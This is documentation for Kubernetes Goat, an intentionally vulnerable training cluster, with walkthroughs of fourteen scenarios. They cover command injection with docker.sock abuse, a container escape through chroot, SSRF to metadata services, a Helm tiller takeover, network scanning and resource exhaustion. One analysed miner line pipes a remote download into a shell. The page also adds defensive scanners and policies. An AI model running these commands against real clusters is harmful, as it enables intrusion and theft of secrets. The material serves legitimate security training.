
About Kubernetes Goat

Kubernetes Goat is designed to be an intentionally vulnerable cluster environment in which to learn and practice Kubernetes security.


Disclaimer & Warnings

Kubernetes Goat creates intentionally vulnerable resources in your cluster. DO NOT deploy Kubernetes Goat in a production environment or alongside any sensitive cluster resources.

Kubernetes Goat Scenarios

  1. Sensitive keys in code bases
  2. DIND(docker-in-docker) exploitation
  3. SSRF in K8S world
  4. Container escape to access host system
  5. Docker CIS Benchmarks analysis
  6. Kubernetes CIS Benchmarks analysis
  7. Attacking private registry
  8. NodePort exposed services
  9. Helm v2 tiller to PwN the cluster
  10. Analysing crypto miner container
  11. Kubernetes Namespaces bypass
  12. Gaining environment information
  13. DoS the memory/cpu resources
  14. Hacker Container preview

Kubernetes Goat Architecture

TBD

Author

Kubernetes Goat was created by Madhu Akula

Madhu Akula is a security ninja, published author and cloud native security researcher with extensive experience. He is also an active member of the international security, DevOps and cloud native communities (null, DevSecOps, AllDayDevOps, etc.), and holds industry certifications such as OSCP (Offensive Security Certified Professional) and CKA (Certified Kubernetes Administrator). Madhu frequently speaks and runs training sessions at security events and conferences around the world, including DEFCON (24, 26 & 27), BlackHat USA (2018 & 19), USENIX LISA (2018 & 19), O'Reilly Velocity EU 2019, GitHub Satellite 2020, Appsec EU (2018 & 19), All Day DevOps (2016, 17, 18, 19 & 20), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n (2017, 18), Nullcon (2018, 19), SACON 2019, Serverless Summit, null and many others. His research has identified vulnerabilities in 200+ companies and organisations including Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP and Adobe, and he has been credited with multiple CVEs, acknowledgements and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He also won 1st prize for building an Infrastructure Security Monitoring solution at the InMobi flagship hackathon among 100+ engineering teams.

Learning Kubernetes

Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. - Wikipedia

What is Kubernetes - The Illustrated Children's Guide to Kubernetes


source: https://www.youtube.com/watch?v=4ht22ReBjno

Kubernetes Overview


Image source: Khtan66 CC BY-SA 4.0, from Wikimedia Commons

Resources to learn more about Kubernetes

Kubernetes Cluster Setup

Before we set up Kubernetes Goat, we need cluster-admin access to a working Kubernetes cluster.

There are many ways to run a Kubernetes cluster. Some of them include:

  • Cloud provider Kubernetes service (like GKE, EKS, AKS, DO, etc.)
  • Locally provisioned cluster
  • Minikube environment
  • Katacoda Playground

Refer to the Kubernetes setup documentation for more information and details at https://kubernetes.io/docs/setup/

Kubernetes playground by Katacoda


https://katacoda.com/madhuakula/scenarios/kubernetes-goat

Google Kubernetes Engine (GKE) Setup

  • Navigate to the Google Cloud console at https://console.cloud.google.com

  • Choose the project in which you want to set up the Kubernetes cluster in Google Cloud

  • Then open Google Cloud Shell by clicking the terminal icon at the top right

Creating a new GKE cluster

# Import the required environment variables
export KUBERNETESGOATCLUSTERNAME="kubernetes-goat"
export KUBERNETESGOATREGION="us-central1"
export KUBERNETESGOATCLUSTERVERSION="1.16.8-gke.15"
export KUBERNETESGOATPROJECTNAME="<YOUR GOOGLE PROJECT ID>"

# Set up the GKE cluster
gcloud beta container --project "$KUBERNETESGOATPROJECTNAME" clusters create "$KUBERNETESGOATCLUSTERNAME" \
  --zone "$KUBERNETESGOATREGION-a" --no-enable-basic-auth --cluster-version "$KUBERNETESGOATCLUSTERVERSION" \
  --machine-type "n1-standard-1" --image-type "UBUNTU" --disk-type "pd-standard" --disk-size "50" \
  --metadata disable-legacy-endpoints=true,GOAT_KEY="azhzLWdvYXQtNmJlNGRkMWI3ZmE4NGUzNzA0ODllZGQ2NDA0MWQ2MTk=" \
  --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" \
  --preemptible --num-nodes "2" --enable-stackdriver-kubernetes --enable-ip-alias \
  --network "projects/$KUBERNETESGOATPROJECTNAME/global/networks/default" \
  --subnetwork "projects/$KUBERNETESGOATPROJECTNAME/regions/$KUBERNETESGOATREGION/subnetworks/default" \
  --default-max-pods-per-node "110" --enable-autoscaling --min-nodes "1" --max-nodes "5" \
  --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing \
  --no-enable-autoupgrade --no-enable-autorepair --maintenance-window "03:00"

# Get the GKE cluster credentials into Google Cloud Shell
gcloud container clusters get-credentials $KUBERNETESGOATCLUSTERNAME --zone $KUBERNETESGOATREGION-a --project $KUBERNETESGOATPROJECTNAME

  • Check the Kubernetes cluster access by running kubectl version --short

Miscellaneous

  • When you start a new project or create a Kubernetes cluster for the first time in GKE, it might take a while to enable the API, so you might see the error/message below.

Kubernetes Engine API is being enabled. This may take a minute or more. Learn more

Kubernetes Goat Setup

This document explains the steps to set up Kubernetes Goat in your Kubernetes cluster.

Please do not set up Kubernetes Goat alongside your production workloads, as it is designed to be intentionally vulnerable.

Free online Kubernetes Goat playground


https://katacoda.com/madhuakula/scenarios/kubernetes-goat

Pre-requisites

Setting up Kubernetes Goat

  • To set up the Kubernetes Goat resources in your cluster, run the following commands
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat
bash setup-kubernetes-goat.sh

Scenarios

Welcome to Kubernetes Goat Scenarios. This is the home for exploring your Kubernetes Goat scenarios: discovery, exploitation, attacks, endpoints, etc.

Ensure you have the kubectl and docker binaries installed on your host system to get the most out of this training platform. Follow each scenario by clicking on it.

Access the Kubernetes Goat environment resources

  • Ensure the pods are in the Running state before running the access script
kubectl get pods


  • Run the following script to access the environment
bash access-kubernetes-goat.sh


Flags look like the one below

The flag format looks like k8s-goat-2912d3d0b262bb16afbe450034089463

List of Scenarios

  1. Sensitive keys in code bases
  2. DIND(docker-in-docker) exploitation
  3. SSRF in K8S world
  4. Container escape to access host system
  5. Docker CIS Benchmarks analysis
  6. Kubernetes CIS Benchmarks analysis
  7. Attacking private registry
  8. NodePort exposed services
  9. Helm v2 tiller to PwN the cluster
  10. Analysing crypto miner container
  11. Kubernetes Namespaces bypass
  12. Gaining environment information
  13. DoS the memory/cpu resources
  14. Hacker Container preview

Sensitive keys in code bases

Scenario Information

Developers tend to commit sensitive information to version control systems. As we move towards CI/CD and GitOps systems, we tend to forget to check for sensitive information in code and commits. Let's see if we can find something cool here!

Scenario 1 Entry

Scenario Solution

Method 1

After reading the scenario description and application information, we performed some discovery and analysis and identified that the application has its .git folder exposed.

Scenario 1 Git folder found

  • Clone the git repository locally by running the following command. Ensure you have set up git-dumper locally before running it
python3 git-dumper.py http://localhost:1230/.git k8s-goat-git

Scenario 1 git-dumper clone locally

  • Now check the git log information
cd k8s-goat-git
git log

Scenario 1 Git log history

  • Check out the older commit to inspect that specific version
git checkout 128029d89797957957b2a7198d8d159b239b34eb
ls -la
cat .env

Scenario 1 Gain access to flag

Method 2

Sometimes we already have access to the pods or containers, and we can perform the analysis from within the container as well.

export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh

Scenario 1 access to pod

  • Then we can analyse the .git folder by running utilities like trufflehog
trufflehog .

Scenario 1 trufflehog discovery
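As an added example (not Kubernetes Goat or trufflehog code), a minimal secret scanner of the kind this scenario's tooling performs, run over file contents from a checkout; the k8s-goat-<32 hex> pattern is this page's flag format, while the other patterns, the entropy threshold and the sample files are illustrative assumptions:

```python
import math
import re

# Added example, not Kubernetes Goat or trufflehog code: a minimal secret scanner
# run over the contents of a checkout (repeat it per commit with `git show
# <commit>:<path>` to cover history). Values are flagged when they match a known
# secret shape or when a sensitively named variable holds a high-entropy value.
# The k8s-goat-<32 hex> pattern is this page's flag format; the others are
# illustrative.

KNOWN_PATTERNS = {
    "kubernetes-goat flag": re.compile(r"\bk8s-goat-[0-9a-f]{32}\b"),
    "AWS access key id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private key block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}
# KEY=value or key: value, optional export prefix and quotes; value stops at whitespace or '#'
ASSIGNMENT = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*[=:]\s*['\"]?([^'\"\s#]+)")
SENSITIVE_NAME = re.compile(r"key|secret|token|passw|credential|api", re.IGNORECASE)


def shannon_entropy(value):
    """Bits per character: English words sit around 3, random hex near 4, random base64 near 6."""
    if not value:
        return 0.0
    length = len(value)
    return -sum((value.count(ch) / length) * math.log2(value.count(ch) / length) for ch in set(value))


def scan_text(path, text, entropy_threshold=3.5, min_len=16):
    """Return (path, line_number, label) tuples for suspicious lines in one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in KNOWN_PATTERNS.items():
            if pattern.search(line):
                findings.append((path, lineno, label))
        match = ASSIGNMENT.match(line)
        if match and SENSITIVE_NAME.search(match.group(1)):
            value = match.group(2)
            if len(value) >= min_len and shannon_entropy(value) >= entropy_threshold:
                findings.append((path, lineno, "high-entropy value assigned to %s" % match.group(1)))
    return findings


def scan_files(files):
    """files maps path -> content, as built from `git ls-files` over a checkout."""
    return [f for path, text in sorted(files.items()) for f in scan_text(path, text)]


# Constructed sample checkout: a committed .env with a flag and an API token,
# a short placeholder password that should not trigger, and an innocent README.
SAMPLE_CHECKOUT = {
    ".env": "DB_HOST=db.internal\n"
            "K8S_GOAT_FLAG=k8s-goat-0123456789abcdef0123456789abcdef\n"
            "API_TOKEN=Yx7Qp2LmN9vR4tWz8KbD3cFgH6jJsV1a\n"
            "PASSWORD=changeme\n",
    "README.md": "Set DEBUG=true to enable verbose logging.\n",
}

if __name__ == "__main__":
    for path, lineno, label in scan_files(SAMPLE_CHECKOUT):
        print("%s:%d: %s" % (path, lineno, label))
```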

Miscellaneous

TBD

DIND(docker-in-docker) exploitation

Scenario Information

Most CI/CD and pipeline systems that use Docker and build containers for you within the pipeline use something called DIND (docker-in-docker). In this scenario, we try to exploit it and gain access to the host system.

  • To get started with the scenario, navigate to http://127.0.0.1:1231; the username is admin and the password is kubernetesgoat

Scenario 2 Login

Scenario 2 Home

Scenario Solution

  • Looking at the application functionality, we identified that it has a command injection vulnerability
madhuakula.com; id

Scenario 2 Command Injection

  • After quite some analysis, we identified that there is a docker.sock mount available in the file system
mount

Scenario 2 mount

  • Download the Docker static binary into the container, again through the command injection (hence the leading semicolon)
;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz

Scenario 2 download docker binary

  • Extract the binary from the docker-19.03.9.tgz file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

Scenario 2 extract binary

  • Access the host system by running the following docker commands against the mounted docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

Scenario 2 extract binary

Miscellaneous

TBD

SSRF in K8S world

Scenario Information

SSRF (Server Side Request Forgery) has become the go-to attack for cloud native environments. In this scenario, we will see how we can exploit an application vulnerability like SSRF to gain access to cloud instance metadata as well as internal services' metadata information.

Scenario 3 Welcome

Scenario Solution

Based on the description, we know that this application is possibly vulnerable to SSRF. Let's go ahead and access the default instance metadata service at 169.254.169.254. Identify which cloud provider you are running this service on, then use the provider-specific headers and queries.

  • Let's also see which ports are listening within the same pod/container. The endpoint is http://127.0.0.1:5000 and the method is GET

Scenario 3 internal port

  • Now we can see that there is an internal-only service exposed within the cluster, called http://metadata-db

Scenario 3 access metadata service

  • After enumerating through all the key values, we finally identified the flag at http://metadata-db/latest/secrets/kubernetes-goat

Scenario 3 access flag

  • Decoding the base64 value returns the flag k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab
echo -n "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d

Scenario 3 decode base64
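As an added example (not part of Kubernetes Goat), the gate a URL-fetching feature would apply before making a server-side request, so that the metadata endpoint 169.254.169.254 and cluster-internal names like metadata-db are unreachable even through IPv6-mapped, decimal or DNS-resolved forms; the blocked CIDRs, hostnames and suffixes are illustrative assumptions:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example, not Kubernetes Goat code: a gate for a server-side URL fetcher.
# Every hostname, suffix and CIDR below is an illustrative assumption.

BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",                    # link-local, includes the metadata endpoint 169.254.169.254
    "127.0.0.0/8", "0.0.0.0/8",          # loopback and "this network"
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10",  # RFC1918 pod/service CIDRs, CGNAT
    "::1/128", "fe80::/10", "fc00::/7",  # IPv6 loopback, link-local, ULA
)]
INTERNAL_SUFFIXES = (".local", ".internal", ".svc", ".cluster")
BLOCKED_HOSTNAMES = {"localhost", "metadata", "metadata-db", "metadata.google.internal"}


def _normalise(ip):
    """Unwrap IPv4-mapped IPv6 so ::ffff:169.254.169.254 is judged as IPv4."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        return ip.ipv4_mapped
    return ip


def is_blocked_ip(ip):
    ip = _normalise(ip)
    return (ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or any(ip in net for net in BLOCKED_NETWORKS))


def literal_ip(host):
    """Parse an IP literal, including the bare decimal form (2852039166 is 169.254.169.254)."""
    try:
        if host.isdigit():
            return ipaddress.IPv4Address(int(host))
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def system_resolver(host):
    """All A/AAAA answers for host; swapped out in tests so the check runs offline."""
    try:
        return [ipaddress.ip_address(info[4][0].split("%")[0])
                for info in socket.getaddrinfo(host, None)]
    except socket.gaierror:
        return []


def check_outbound_url(url, resolver=system_resolver):
    """Return (True, pinned_ip) or (False, reason).

    The caller must connect to the pinned address rather than resolving the
    hostname a second time, otherwise the DNS answer can change between this
    check and the real request (rebinding)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "missing host"
    ip = literal_ip(host)
    if ip is not None:
        addresses = [ip]
    else:
        if host in BLOCKED_HOSTNAMES or "." not in host or host.endswith(INTERNAL_SUFFIXES):
            return False, "internal hostname %r" % host
        addresses = resolver(host)
        if not addresses:
            return False, "hostname %r does not resolve" % host
    for addr in addresses:
        if is_blocked_ip(addr):
            return False, "%s resolves to blocked address %s" % (host, addr)
    return True, str(_normalise(addresses[0]))
```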

Miscellaneous

TBD

Container escape to access host system

Scenario Information

Most monitoring, tracing and debugging software needs to run with extra privileges and capabilities. In this scenario, we will see how a pod with extra capabilities and privileges, including a HostPath mount, allows us to gain access to the host system and to node-level configuration, leading to complete cluster compromise.

Scenario 4 Welcome

Scenario Solution

After performing the analysis, we identified that this container runs with full host privileges and allows privilege escalation. In addition, /host-system is mounted from the host system.

ls /
ls /host-system/

Scenario 4 host system

  • Gain host-level access by chrooting into the mounted host filesystem
chroot /host-system bash
docker ps

Scenario 4 chroot host

  • Accessing the node level kubelet Kubernetes configuration
cat /var/lib/kubelet/kubeconfig

Scenario 4 kubelet config

Download kubectl locally to use this config and perform operations

  • Use the kubelet configuration to query cluster-wide Kubernetes resources
kubectl --kubeconfig /var/lib/kubelet/kubeconfig get all -n kube-system

Scenario 4 get kube-system

  • From here we can go further by performing lateral movement and post-exploitation

Miscellaneous

TBD

Docker CIS Benchmarks analysis

Scenario Information

This scenario performs Docker CIS benchmarks analysis on the Kubernetes nodes to identify possible security vulnerabilities.

  • To get started with this scenario, you can either access a node and follow the docker-bench-security instructions, or run the following command to deploy docker-bench-security as a DaemonSet
kubectl apply -f scenarios/docker-bench-security/deployment.yaml
kubectl get daemonsets

Scenario 5 Docker bench DS

Scenario Solution

  • Access each docker-bench-security-xxxxx pod (one per node in your Kubernetes cluster) and run the Docker CIS benchmarks
kubectl exec -it docker-bench-security-xxxxx -- sh
cd docker-bench-security

  • Run the Docker CIS benchmarks script
sh docker-bench-security.sh

Scenario 5 Run Docker bench

  • Now, based on the findings from the Docker CIS benchmarks, you can proceed with further exploitation

Miscellaneous

TBD

Kubernetes CIS Benchmarks analysis

Scenario Information

This scenario performs Kubernetes CIS benchmarks analysis on the Kubernetes nodes to identify possible security vulnerabilities.

  • To get started with this scenario, you can either access a node and follow the kube-bench instructions, or run the following commands to deploy kube-bench as Kubernetes jobs
kubectl apply -f scenarios/kube-bench-security/node-job.yaml
kubectl apply -f scenarios/kube-bench-security/master-job.yaml

Scenario 6 Kube bench job

Scenario Solution

  • Now go ahead and get the job list and pod logs by running the commands below
kubectl get jobs
kubectl logs -f kube-bench-node-xxxxx

Scenario 6 Kube bench output

  • Now, based on the findings from the Kubernetes CIS benchmarks, you can proceed with further exploitation

Miscellaneous

TBD

Attacking private registry

Scenario Information

A container registry is the place where all the container images get pushed. Most of the time each organisation has its own private registry. Sometimes it ends up misconfigured and public/open. On the other hand, developers assume that it's an internal, private registry and end up storing sensitive information inside the container images. Let's see what we can find here.

Scenario 7 Welcome

Scenario Solution

As this is an intentionally vulnerable design, we provide the endpoint directly. In the real world you would have to do some recon.

  • Based on the scenario and information, we identified that it is possibly a private Docker container registry

  • After reading some docs and googling, here are the simple API endpoint queries for the container registry

curl http://127.0.0.1:1235/v2/
curl http://127.0.0.1:1235/v2/_catalog

Scenario 7 image catalog

  • Get more information about the images inside the registry from the API using the query below
curl http://127.0.0.1:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest

Scenario 7 image info

  • Now we observe that the Docker container has an ENV variable holding API key information

Scenario 7 api key info

This can be taken a little further by using the docker client to download the images locally and analyse them. In some cases you can even push images to the registry, depending on the permissions and privileges

Miscellaneous

TBD

NodePort exposed services

Scenario Information

If a user has exposed a service within the Kubernetes cluster using NodePort, and the nodes where the cluster runs don't have any firewall/network security enabled, we end up with unauthenticated and unauthorized services exposed to the outside.

  • To get started with the scenario, run the following command and look for open ports on the Kubernetes nodes
kubectl get nodes -o wide

When Kubernetes creates a NodePort service, it allocates a port from a range specified in the flags that define your Kubernetes cluster. (By default, these are ports ranging from 30000-32767.)

Scenario Solution

  • Get the external IP addresses of the Kubernetes nodes
kubectl get nodes -o wide

Scenario 8 get nodes

  • Now, let's find the open ports. Here you can use traditional security scanning utilities like Nmap

  • Once we have identified that there is a NodePort exposed, we can verify it by connecting to it

nc -zv EXTERNAL-IP-ADDRESS 30003

Scenario 8 access nodeport

This vulnerability/attack varies depending on how the Kubernetes cluster has been configured

Miscellaneous

TBD

Helm v2 tiller to PwN the cluster

Scenario Information

Helm is a package manager for Kubernetes; it's like apt-get for Ubuntu. In this scenario, we will see how the older version of Helm (version 2) with the default tiller service RBAC setup lets us gain access to the complete cluster.

  • To get started with the scenario, run the following command
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash

Scenario 9 welcome

Scenario Solution

  • By default the Helm version 2 tiller deployment has RBAC with full cluster administrator privileges
  • The default installation is in the kube-system namespace with the service name tiller-deploy and port 44134 exposed on 0.0.0.0, so we can verify by running the telnet command
telnet tiller-deploy.kube-system 44134

Scenario 9 telnet

  • Now that we are able to connect to the tiller service port, we can use the helm binary to perform operations and talk to the tiller service
helm --host tiller-deploy.kube-system:44134 version

Scenario 9 telnet

  • Let's try whether we can get Kubernetes secrets from the kube-system namespace
kubectl get secrets -n kube-system

Scenario 9 before secrets

  • Now we can create our own helm chart that gives the default service account full cluster admin access, since by default the current pod is deployed in the default namespace and uses the default service account
helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart

Scenario 9 deploy chart

  • Now that the pwnchart has been deployed, it has given all the default service accounts cluster admin access. Let's try getting the kube-system namespace secrets again
kubectl get secrets -n kube-system

Scenario 9 deploy chart

This scenario varies depending on how the tiller deployment has been performed; sometimes admins deploy tiller to a specific namespace with specific privileges. Also, from Helm version 3 there is no tiller service, which mitigates such vulnerabilities
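As an added example (not Kubernetes Goat code), an audit of ClusterRoleBindings for the condition this scenario ends in, namely cluster-admin handed to default service accounts, to the built-in all-service-accounts group, or to a tiller-style workload identity; the input shape is that of `kubectl get clusterrolebindings -o json`, and the sample bindings are constructed:

```python
import json

# Added example, not Kubernetes Goat code: audit ClusterRoleBindings for the
# condition the pwnchart creates, namely powerful roles granted to default
# service accounts or to the cluster-wide built-in groups. Input is the JSON
# produced by `kubectl get clusterrolebindings -o json`.

PRIVILEGED_ROLES = {"cluster-admin", "admin", "edit"}
BROAD_GROUPS = {"system:serviceaccounts", "system:authenticated", "system:unauthenticated"}


def risky_subject(subject, role):
    """Explain why this subject should not hold `role`, or return None."""
    kind = subject.get("kind")
    name = subject.get("name", "")
    ns = subject.get("namespace", "")
    if kind == "Group" and (name in BROAD_GROUPS or name.startswith("system:serviceaccounts:")):
        return "the broad group %s" % name
    if kind == "User" and name == "system:anonymous":
        return "anonymous users"
    if kind == "ServiceAccount" and name == "default":
        return "the default service account of namespace %s" % ns
    if kind == "ServiceAccount" and role == "cluster-admin":
        return "service account %s/%s (a workload identity holding cluster-admin)" % (ns, name)
    return None


def audit_cluster_role_bindings(binding_list):
    """Return one human-readable finding per risky (binding, subject) pair."""
    findings = []
    for binding in binding_list.get("items", []):
        role = binding.get("roleRef", {}).get("name")
        if role not in PRIVILEGED_ROLES:
            continue
        for subject in binding.get("subjects") or []:
            why = risky_subject(subject, role)
            if why:
                findings.append("%s grants %s to %s" % (binding["metadata"]["name"], role, why))
    return findings


# Constructed sample: the stock cluster-admin binding, a Helm v2 tiller binding,
# a binding in the shape the pwnchart creates, and a harmless read-only one.
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"name": "cluster-admin"},
   "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
   "subjects": [{"kind": "Group", "name": "system:masters"}]},
  {"metadata": {"name": "tiller"},
   "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
   "subjects": [{"kind": "ServiceAccount", "name": "tiller", "namespace": "kube-system"}]},
  {"metadata": {"name": "pwnchart-all-serviceaccounts"},
   "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
   "subjects": [{"kind": "Group", "name": "system:serviceaccounts"}]},
  {"metadata": {"name": "view-for-everyone"},
   "roleRef": {"kind": "ClusterRole", "name": "view"},
   "subjects": [{"kind": "Group", "name": "system:authenticated"}]}
]}
""")

if __name__ == "__main__":
    for line in audit_cluster_role_bindings(SAMPLE):
        print(line)
```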

Miscellaneous

Analysing crypto miner container

Scenario Information

Crypto mining has become popular on modern infrastructure. Environments like Kubernetes in particular are easy targets, as you might not even look at what the container image is built upon and what it is doing without proactive monitoring. In this scenario, we will analyse and identify the crypto miner.

  • To get started, identify all the resources/images in the Kubernetes cluster, including Jobs.
kubectl get jobs

Scenario 10 get jobs

Scenario Solution

Identify all the resources within the Kubernetes cluster. If possible, get into the details of each container image available on all the nodes within the cluster as well

  • Once we have identified the job running in the Kubernetes cluster, get the job information by running the following command
kubectl describe job batch-check-job

Scenario 10 get job info

  • Then get the pod information by running the command below
kubectl get pods --namespace default -l "job-name=batch-check-job"

  • Then get the pod manifest and analyse it
kubectl get pod batch-check-job-xxxx -o yaml

Scenario 10 get pod info

  • We identified that it's running the madhuakula/k8s-goat-batch-check docker image

  • After analysing this image, we identified that it has the mining stuff in a build-time script in one of the layers

docker history --no-trunc madhuakula/k8s-goat-batch-check

Scenario 10 get docker history

echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup

Miscellaneous

TBD

Kubernetes Namespaces bypass

Scenario Information

By default Kubernetes uses a flat networking schema, which means any pod/service within the cluster can talk to any other. The namespaces within the cluster don't have any network security restrictions by default; anyone in any namespace can talk to any other namespace. We heard that Kubernetes Goat loves cache. Let's see if we can gain access to other namespaces

  • To get started with the scenario, let's run our awesome hacker-container in the default namespace
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh

Scenario 11 Welcome

Scenario Solution

  • Get the cluster IP range information
ip route
ifconfig
printenv

Scenario 11 recon

  • Based on the analysis/understanding of the system, we can run an internal scan of the entire cluster range using zmap
zmap -p 6379 10.0.0.0/8 -o results.csv

Scenario 11 zmap

Scenario 11 output ips

There is also another way to access the services/pods in Kubernetes, for example by name as servicename.namespace

  • Let's access the redis using the redis-cli client
redis-cli -h 10.12.0.2
KEYS *
GET SECRETSTUFF

Scenario 11 redis access

There are many other services and resources exposed within the cluster, like ElasticSearch, Mongo, etc. So if your recon skills are good, you have a gold mine here.
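As an added example (not a Kubernetes Goat manifest), the NetworkPolicy objects that would close the flat-network path this scenario relies on: a default-deny ingress policy for the namespace holding the cache store, plus an explicit allow for its legitimate clients on 6379. The namespace name secure-middleware is taken from the checkov report later on this page; the pod and namespace labels are assumptions.

```yaml
# Added example, not a Kubernetes Goat manifest. Assumes the cache-store (redis)
# deployment runs in the secure-middleware namespace with the label app=cache-store,
# and that only pods labelled role=cache-client in namespaces labelled team=backend
# legitimately need to reach it.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: secure-middleware
spec:
  podSelector: {}          # selects every pod in the namespace
  policyTypes:
  - Ingress                # Ingress listed with no rules = deny all inbound traffic
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-redis-from-backend
  namespace: secure-middleware
spec:
  podSelector:
    matchLabels:
      app: cache-store     # assumed label on the redis pods
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          team: backend    # assumed label on the client namespaces
      podSelector:
        matchLabels:
          role: cache-client
    ports:
    - protocol: TCP
      port: 6379
```

NetworkPolicy is only enforced when the cluster's network plugin supports it; the GKE create command earlier on this page does not pass --enable-network-policy, so on that cluster these objects would be accepted by the API server but have no effect.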

Miscellaneous

TBD

Gaining environment information

Scenario Information

Each Kubernetes environment has a lot of information to share. Some of the key things include secrets, API keys, configs, services and many others. So let's go ahead and find the vault key!

Scenario 12 Welcome

Scenario Solution

  • Go ahead and explore the system as a generic Linux system
cat /proc/self/cgroup
cat /etc/hosts
mount
ls -la /home/

Scenario 12 explore

  • Get the environment variables, including the mounted Kubernetes secret K8S_GOAT_VAULT_KEY=k8s-goat-cd2da27224591da2b48ef83826a8a6c, service names, ports, etc.
printenv

Scenario 12 env

Miscellaneous

TBD

DoS the memory/cpu resources

Scenario Information

When there is no resource specification in the Kubernetes manifests and no limit ranges are applied to the containers, an attacker can consume all the resources of the node where the pod/deployment is running, starve other workloads and cause a DoS for the environment.

Scenario 13 Welcome

Scenario Solution

  • This deployment's pod has no resource limits set in the Kubernetes manifests, so we can easily perform a bunch of operations that consume resources
  • In this pod we have installed a ready-to-use utility called stress-ng
stress-ng --vm 2 --vm-bytes 2G --timeout 30s

Scenario 13 stress-ng

  • You can see the difference while running stress-ng and after
kubectl top pod hunger-check-deployment-xxxxxxxxxx-xxxxx

Scenario 13 kubectl top

This attack may not work in some cases, like autoscaling, resource restrictions, etc.

Miscellaneous

TBD

Hacker Container preview

Scenario Information

This scenario is just an exploration of the common security utilities inside the Kubernetes cluster environment. I think by this time you have already used hacker-container multiple times.

  • To get started with this scenario, run the hacker container using the command below
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh

Scenario 14 Welcome

Scenario Solution

Hacker Container is a utility image with a list of useful tools/commands for hacking Kubernetes clusters, so there is no limit to your exploration of Kubernetes environments. Here we will see some of the most useful and powerful utilities

  • Container introspection utility to get an overview of the system, its capabilities, etc.
amicontained

Scenario 14 amicontained

  • Performing Nikto scan against internal services
nikto.pl -host http://metadata-db

Scenario 14 amicontained

There are many other use cases. To get the most out of hacker-container, we can use it with host privileges, volumes, processes, etc. This will be updated soon with more details.

Miscellaneous

TBD

Teardown Kubernetes Goat

  • Teardown the entire Kubernetes Goat infrastructure
bash teardown-kubernetes-goat.sh

Note: Ensure you clean up what you installed and used. It's better to delete the cluster.

Security Scanning Reports

This section contains security scanning reports produced by multiple open source security tools scanning the Kubernetes Goat infrastructure.

checkov report for Kubernetes Goat

To identify all of the 232 Kubernetes configuration issues, run checkov by Bridgecrew

https://twitter.com/BarakSchoster/status/1273170904894377985

# | check_id | file | resource | check_name
0 | CKV_K8S_31 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Ensure that the seccomp profile is set to docker/default or runtime/default
1 | CKV_K8S_40 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Containers should run as a high UID to avoid host conflict
2 | CKV_K8S_29 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Apply security context to your pods and containers
3 | CKV_K8S_38 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Ensure that Service Account Tokens are only mounted where necessary
4 | CKV_K8S_23 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Minimize the admission of root containers
5 | CKV_K8S_37 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Minimize the admission of containers with capabilities assigned
6 | CKV_K8S_8 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Liveness Probe Should be Configured
7 | CKV_K8S_12 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Memory requests should be set
